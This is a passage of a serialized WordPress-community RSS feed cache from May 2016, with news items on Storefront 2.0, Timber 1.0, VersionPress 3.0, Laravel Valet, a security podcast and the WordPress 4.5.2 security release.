Design\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54641\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"http://wptavern.com/woocommerce-releases-storefront-2-0-with-major-improvements-to-mobile-design\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3509:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/storefront-update.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/storefront-update.png?resize=1025%2C451\" alt=\"storefront-update\" class=\"aligncenter size-full wp-image-54669\" /></a></p>\n<p><a href=\"https://wordpress.org/themes/storefront/\" target=\"_blank\">Storefront</a>, the official WooCommerce theme built to work seamlessly with the plugin, has just passed the <a href=\"https://www.woothemes.com/2016/05/storefront-2-0-release/\" target=\"_blank\">2.0 milestone</a>. This release introduces a new “best sellers” section to the homepage and adds compatibility with the upcoming WooCommerce 2.6’s tabbed “My Account” section and the average rating widget.</p>\n<p>The most important update in Storefront 2.0 is the redesigned mobile experience. According to <a href=\"http://resources.mobify.com/50-mobile-commerce-stats.html\" target=\"_blank\">Mobify</a>, 30% of mobile shoppers will abandon a transaction if the experience is not optimized for mobile. <a href=\"http://www.themobileplaybook.com/\" target=\"_blank\">Google’s Mobile Playbook</a> says that not having a mobile optimized website is like closing your store one day each week. To keep pace with the expectations of mobile buyers, WooCommerce has drastically reduced Storefront’s mobile header height by 60% and has added the search, shopping cart, and account links to a sticky bottom menu for easy access.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/storefront-mobile-home.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/storefront-mobile-home.png?resize=799%2C697\" alt=\"storefront-mobile-home\" class=\"aligncenter size-full wp-image-54671\" /></a></p>\n<p>Storefront 2.0 includes many design improvements that make the theme cleaner and more flexible. This update removes Helvetica in favor of Source Sans, which WooCommerce says gives them access to a wider variety of weights they can use to “provide greater depth and cohesion.” Other notable design changes include:</p>\n<ul>\n<li>Borders have been largely removed so that pages don’t feel quite so broken up.</li>\n<li>The breadcrumb and the main navigation are now wrapped in their own content regions, cementing them as unique components.</li>\n<li>Product reviews and comments tweaked to make them cleaner and more scannable.</li>\n<li>Blog post meta has been redesigned to include the author Gravatar.</li>\n<li>Softer design treatment for tables with colors based on the main background color.</li>\n<li>oEmbeds have been styled to match the rest of Storefront (including typography, padding, colors).</li>\n<li>Integrated WordPress 4.5’s custom logo feature so users can add a logo without using a plugin.</li>\n</ul>\n<p><a href=\"https://wordpress.org/themes/storefront/\" target=\"_blank\">Storefront</a> is active on more than 50,000 websites. There are nearly a dozen free themes on WordPress.org that use it as a parent theme and another dozen commercial themes on WooThemes.com. If you use a heavily customized Storefront child theme, you may want to test its compatibility with the 2.0 update on a development site to ensure that there are no visual surprises. If you have any ideas or recommendations for updates to Storefront, you can leave feedback on the theme’s <a href=\"http://ideas.woothemes.com/forums/275029-storefront\" target=\"_blank\">idea board</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 May 2016 22:23:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"WPTavern: Timber 1.0 Is Now Available on WordPress.org\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54396\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"http://wptavern.com/timber-1-0-is-now-available-on-wordpress-org\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5932:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/timber.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/timber.png?resize=1025%2C405\" alt=\"timber\" class=\"aligncenter size-full wp-image-54630\" /></a></p>\n<p>Last week the creators of <a href=\"https://wordpress.org/plugins/timber-library/\" target=\"_blank\">Timber</a>, the plugin that enables WordPress theme developers to write HTML using the <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig Template Engine</a>, released version 1.0 on WordPress.org. The plugin is active on more than 10,000 websites where theme authors have elected to keep PHP files separate from HTML. Timber is built on DRY and MVC principles to solve the problem stated in its unofficial tagline: <em>“Because WordPress is awesome, but the_loop isn’t.”</em></p>\n<p>Over the past four years, the open source project has evolved from being a starter theme to a plugin that can be added to existing themes. It is now used on <a href=\"http://upstatement.com/timber/#showcase\" target=\"_blank\">thousands of websites</a> and has 83 <a href=\"https://github.com/timber/timber/graphs/contributors\" target=\"_blank\">contributors</a> listed on GitHub.</p>\n<p>“In 2012 I was getting more into WordPress after doing lots of JS development with <a href=\"http://handlebarsjs.com/\" target=\"_blank\">Handlebars</a> (a JS templating language),” Timber creator Jared Novack said. “I went to WordCamp Providence to learn more about state-of-the-art WordPress ways. I remember thinking: ‘This is great, but I really miss the cleanliness of Handlebars — I wish someone would make something like that for WordPress.’ That’s when I realized, I was that someone.”</p>\n<p>Novack was playing around with <a href=\"http://www.smarty.net/\" target=\"_blank\">Smarty</a> and <a href=\"https://mustache.github.io/\" target=\"_blank\">Mustache</a> before he finally discovered Fabien Potencier’s <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig project</a>.</p>\n<p>“The syntax felt so natural I almost didn’t need to read the docs (don’t worry, I did),” he said. “I realized what I needed was a way to marry Twig and WordPress, and thus: Timber was born.”</p>\n<p>At that time Novack’s company, <a href=\"https://upstatement.com/\" target=\"_blank\">Upstatement</a>, was beginning development on a big new project for Random House to enable their marketers to generate unique sites from a library of templates. This client project became Timber’s first test case.</p>\n<p>“Originally, Timber was a parent theme, like _s. But after we completed the Random House project, I realized I wanted to apply Timber functionality to existing sites,” Novack said. “I converted it into a plugin that could be employed on existing themes which is the form it takes today.”</p>\n<p>The plugin allows designers skilled with HTML and CSS to create themes without having extensive knowledge of PHP and WordPress functions. Timber successfully powers sites like Michael Bloomberg’s <a href=\"https://www.thetrace.org/\" target=\"_blank\">The Trace</a>, <a href=\"http://everytown.org/\" target=\"_blank\">Everytown for Gun Safety</a>, <a href=\"https://www.hoteltonight.com/\" target=\"_blank\">Hotel Tonight</a>, and the <a href=\"http://harvardlawreview.org/\" target=\"_blank\">Harvard Law Review</a>.</p>\n<h3>Timber 1.0 Puts the Project on the Path of Stability</h3>\n<p>As of Timber 1.0, developers can now include the project as a plugin or require it as a <a href=\"https://packagist.org/packages/timber/timber\" target=\"_blank\">Composer dependency</a>.</p>\n<p>“The big news is that 1.0 represents a maturing of the platform — developers can use Timber and Twig with confidence that they’re building on top of a stable and universal platform,” Novack said.</p>\n<p>This release sheds years of deprecated functions and methods dating back to the project’s early days in 2013. Novack said that technical and documentation debt were the biggest hurdles in getting to 1.0.</p>\n<p>“In hindsight it’s so easy to build stuff, but so hard to build a complete system,” he said. “When Timber started it was just for me and the documentation could just live in my head. I’d add and improve stuff and then live with some of the quirks.”</p>\n<p>As the project and its contributors grew, Novack found it difficult to keep up with the growing codebase while running his company. Bringing it to a place of maturity with up-to-date automated testing and documentation took nearly a year.</p>\n<p>“Backwards compatibility was also a major challenge,” Novack said. “As ideas and new code got submitted, development slowed as every decision might have implications for existing users. We would deprecate features, but I was hesitant to remove things that I knew were mistakes, but that people were using.”</p>\n<p>Developers are encouraged to read the <a href=\"https://github.com/timber/timber/wiki/1.0-Upgrade-Guide\" target=\"_blank\">1.0 Upgrade Guide</a>, as there may be additional steps required depending on how Timber is being used. This release adds a few new features but the most important change is the bulk removal of older sections of the codebase. The upgrade guide outlines all of the object properties and static methods that will need to be updated so that nothing breaks. In the future, Timber-powered themes will be easier to maintain, with fewer quirks and better-documented features.</p>\n<p>“The key learning for me is that the ultimate ‘killer feature’ is stability and predictability,” Novack said. “When everything is organized cleanly and developers can use the things that they would intuitively expect — that’s success.”</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 May 2016 17:52:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"Post Status: WordPress Security — Draft podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=24378\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://poststatus.com/wordpress-security-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2375:\"<p>Welcome to the Post Status <a href=\"https://poststatus.com/category/draft\">Draft podcast</a>, which you can find <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">on iTunes</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, and <a href=\"http://simplecast.fm/podcasts/1061/rss\">via RSS</a> for your favorite podcatcher. Post Status Draft is hosted by Joe Hoyle — the CTO of Human Made — and Brian Krogsgard.</p>\n<p><span>Security — in WordPress core, distributed plugins and themes, and in our custom code — is a constant battle. It’s important to be vigilant with our security practices, from the perspective of managing our websites and when writing code. In this episode, Joe and Brian discuss the nature of WordPress security, best practices for writing secure code, and dig into various situations WordPress developers and site owners may run into.</span></p>\n<!--[if lt IE 9]><script>document.createElement(\'audio\');</script><![endif]-->\n<a href=\"https://audio.simplecast.com/37301.mp3\">https://audio.simplecast.com/37301.mp3</a>\n<p><a href=\"http://audio.simplecast.com/37301.mp3\">Direct Download</a></p>\n<h3>Links</h3>\n<ul>\n<li><a href=\"http://codex.wordpress.org/Hardening_WordPress\">Hardening WordPress</a></li>\n<li><a href=\"https://wordpress.org/about/security/\">About WordPress Security</a></li>\n<li><a href=\"https://make.wordpress.org/themes/2015/05/19/a-guide-to-writing-secure-themes-part-1-introduction/\">A Guide to Writing Secure Themes</a></li>\n<li><a href=\"http://ben.lobaugh.net/uploads/writing-secure-plugins-and-themes/#/\">Writing Secure Plugins & Themes</a> by Ben Lobaugh</li>\n<li><a href=\"https://codex.wordpress.org/Class_Reference/wpdb\">$wpdb</a></li>\n<li><a href=\"https://wpvulndb.com/\">WP Scan</a></li>\n<li><a href=\"https://blog.sucuri.net/2015/03/understanding-wordpress-plugin-vulnerabilities.html\">Understanding Vulnerabilities</a></li>\n</ul>\n<h3>Sponsor: Pagely</h3>\n<p><a href=\"https://pagely.com\"><span>Pagely</span></a><span> offers best in class managed WordPress hosting, powered by the Amazon Cloud, the Internet’s most reliable infrastructure. Post Status is proudly hosted by Pagely. Thank you to </span><a href=\"https://pagely.com\"><span>Pagely</span></a><span> for being a Post Status partner.</span></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 May 2016 01:01:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Katie Richards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Apple and Podcasting\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=46548\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"https://ma.tt/2016/05/apple-and-podcasting/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:557:\"<p><a href=\"https://marco.org/2016/05/07/apple-role-in-podcasting\">Marco Arment has a great take on how the decentralized nature of podcasting is a feature</a>, not a bug, and Apple being more proactive there would be harmful to the ecosystem. As an aside, since I’ve been in Houston more recently, which means driving a lot, I’ve been really loving his app <a href=\"https://overcast.fm/\">Overcast</a> and I opted in to the optional paid subscription for it. I just need to get in more of a habit of listening to podcasts outside of Houston.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 08 May 2016 14:17:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"WPTavern: VersionPress 3.0 Adds New Search Feature, Bulk Undo, and Commit Tracking per Environment\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54530\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:106:\"http://wptavern.com/versionpress-3-0-adds-new-search-feature-bulk-undo-and-commit-tracking-per-environment\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3843:\"<p><a href=\"https://blog.versionpress.net/2016/04/versionpress-3-0-released/\" target=\"_blank\">VersionPress 3.0</a>, released this week, is the first version since the plugin <a href=\"http://wptavern.com/versionpress-transitions-into-a-free-open-source-project\" target=\"_blank\">became a free, open source project</a>. Creators Borek Bernard and Jan Voráček, who originally attempted to crowdfund the project and then <a href=\"http://wptavern.com/versionpress-raises-400k-in-seed-funding\" target=\"_blank\">raised $400,000 in seed funding</a>, <a href=\"http://wptavern.com/versionpress-transitions-into-a-free-open-source-project\" target=\"_blank\">announced</a> last month that they are transitioning to a public development model.</p>\n<p>The team’s goal with this release was to polish up the experience of using VersionPress in the default WordPress installation while adding more useful features. However, it is not yet ready for use in production, according to Bernard.</p>\n<p>“We’re still keeping VersionPress in the <a href=\"http://docs.versionpress.net/en/getting-started/about-eap\" target=\"_blank\">“early access” period</a>, because of the third party plugins integration story but on simpler sites, VersionPress already shines,” he said.</p>\n<p>One of the most notable new features in VersionPress 3.0 is the plugin’s ability to track commits with the environment where they were created. Users can view changes in the admin and easily see if they were pushed to the staging or production environment.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/commit-tracking-in-environment.gif\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/commit-tracking-in-environment.gif?resize=725%2C347\" alt=\"commit-tracking-in-environment\" class=\"aligncenter size-full wp-image-54599\" /></a></p>\n<p>Version 3.0 also adds searching capabilities for filtering commits by author, date, commit message, and WordPress action. This release also includes a new bulk undo feature for commits and many improvements to the core versioning engine.</p>\n<h3>VersionPress 4.0 to Focus on Support for 3rd Party Plugins</h3>\n<p>One of the reasons the VersionPress team decided to go with a public development model was to mitigate the plugin’s conflicts with third-party themes and plugins. This was only possible if the opened up the codebase for contribution from other developers.</p>\n<p>“While we had most of the WordPress core covered pretty well, there was still this huge ecosystem of WordPress plugins and themes that could cause trouble to VersionPress in million different ways,” Borek said. “In the long run, the project had to turn into OSS should it be successful, and, fortunately, we met investors who understood this and supported our vision.”</p>\n<p>Borek and the team plan to focus on adding support for complex third party plugins in version 4.0, tentatively scheduled for mid-2016. One commenter on the post mentioned that a lack of WooCommerce support is a major thing holding him back from using VersionPress on projects. Borek confirmed that WooCommerce is high on their list of plugins they want to support.</p>\n<p>“Our goal remains the same: to take all the incredibly powerful functionality of Git and package it so that every WordPress user can use it,” Borek said.</p>\n<p>Since most site owners interested in this plugin are not running vanilla installations of WordPress, support for third party plugins will be a major leap forward for the project with the potential to greatly expand its user base. Check out VersionPress’ <a href=\"http://docs.versionpress.net/en/release-notes/roadmap\" target=\"_blank\">roadmap</a> to follow along with its progress and see what’s next.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 May 2016 22:04:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: WordPress 4.5.2 Patches Two Security Vulnerabilities\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54594\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"http://wptavern.com/wordpress-4-5-2-patches-two-security-vulnerabilities\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1441:\"<p>The WordPress core team has <a href=\"https://wordpress.org/news/2016/05/wordpress-4-5-2/\">released WordPress 4.5.2</a> which patches two security vulnerabilities in WordPress versions 4.5.1 and below. The first is a <a href=\"http://www.benhayak.com/2015/06/same-origin-method-execution-some.html\">SOME vulnerability</a> (Same-Origin Method Execution) in Plupload, the third-party library WordPress uses for uploading files. The second is a reflected cross-site-scripting vulnerability in MediaElement.js, the third-party library used for media players.</p>\n<p>Auto updates are rolling out to sites but if you don’t want to wait, browse to Dashboard > Updates and click the Update Now button. Mario Heiderich, Masato Kinugawa, and Filedescriptor of <a href=\"https://cure53.de/\">Cure53</a> are credited with <a href=\"https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/\">responsibly disclosing</a> the vulnerabilities.</p>\n<p>In addition to the release, the core team has <a href=\"https://make.wordpress.org/core/2016/05/06/imagemagick-vulnerability-information/\">published a post</a> concerning the <a href=\"https://imagetragick.com/\">multiple vulnerabilities</a> discovered in ImageMagick, a popular image processing script used on thousands of webhosting servers. The post describes how WordPress is affected and what the team is doing to mitigate issues.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 May 2016 20:01:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"WPTavern: Laravel Releases Valet, a Minimalist Development Environment with Support for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54580\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:106:\"http://wptavern.com/laravel-releases-valet-a-minimalist-development-environment-with-support-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3404:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/valet-parking.jpg\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/valet-parking.jpg?resize=900%2C520\" alt=\"photo credit: Valet Parking, Las Vegas, NV - (license)\" class=\"size-full wp-image-54589\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/55151301@N00/175606346\">Valet Parking, Las Vegas, NV</a> – <a href=\"https://creativecommons.org/licenses/by-nd/2.0/\">(license)</a>\n<p><a href=\"https://laravel.com/\" target=\"_blank\">Laravel</a>, the open source MVC PHP framework created for application development, has just released <a href=\"https://laravel.com/docs/5.2/valet\" target=\"_blank\">Valet</a>, a minimalist development environment for Mac. It uses just 7mb of RAM, because it doesn’t include Vagrant, Apache, Nginx, or a /etc/hosts file. Here’s how it works:</p>\n<blockquote><p>Laravel Valet configures your Mac to always run PHP’s built-in web server in the background when your machine starts. Then, using DnsMasq, Valet proxies all requests on the *.dev domain to point to sites installed on your local machine.\n</p></blockquote>\n<p>Valet supports Laravel, Lumen, Statamic, Craft, Jigsaw, and even has a driver for WordPress. It’s handy if you just need a simple, fast development environment without virtualization. Developers can also share sites publicly via local tunnels. It’s as easy as navigating to the site’s directory in the terminal and running the <code>valet share</code> command, which generates a publicly accessible URL.</p>\n<p><a href=\"https://wppusher.com/\" target=\"_blank\">WP Pusher</a> founder Peter Suhm, who is active in both the Laravel and WordPress communities, wrote a <a href=\"http://blog.wppusher.com/a-minimalist-development-environment-for-wordpress-with-laravel-valet/\" target=\"_blank\">tutorial</a> for setting up Valet for WordPress development.</p>\n<p>“For larger apps, I generally prefer my development environment to be very similar to production,” Suhm said. “Vagrant and Docker are great for that. Valet is great for all those quick and dirty WordPress installations you need, just to test something or quickly work on an idea. If you don’t need anything else besides PHP 7 and a database, Valet is a great setup.”</p>\n<p>Since it doesn’t require a ton of dependencies, Valet is quick to set up and doesn’t require any configuration. Developers don’t even need to make Valet aware that their app is WordPress – you can simply drop WordPress core files into a folder on your machine and then access the site in your browser.</p>\n<p>If you’re looking for a new lightweight development environment or just a quick way to do some PHP 7 testing for WordPress plugins, Valet may fit nicely into your workflow. You can install it using <a href=\"http://brew.sh/\" target=\"_blank\">Homebrew</a>. View the <a href=\"https://laravel.com/docs/5.2/valet#installation\" target=\"_blank\">docs</a> for installation and site setup or follow along with Suhm’s <a href=\"http://blog.wppusher.com/a-minimalist-development-environment-for-wordpress-with-laravel-valet/\" target=\"_blank\">tutorial</a>.</p>\n<p>To see a quick demo of Valet in action, check out the two-minute introduction video created by Adam Wathan:</p>\n<div class=\"embed-wrap\"></div>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 May 2016 18:44:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah 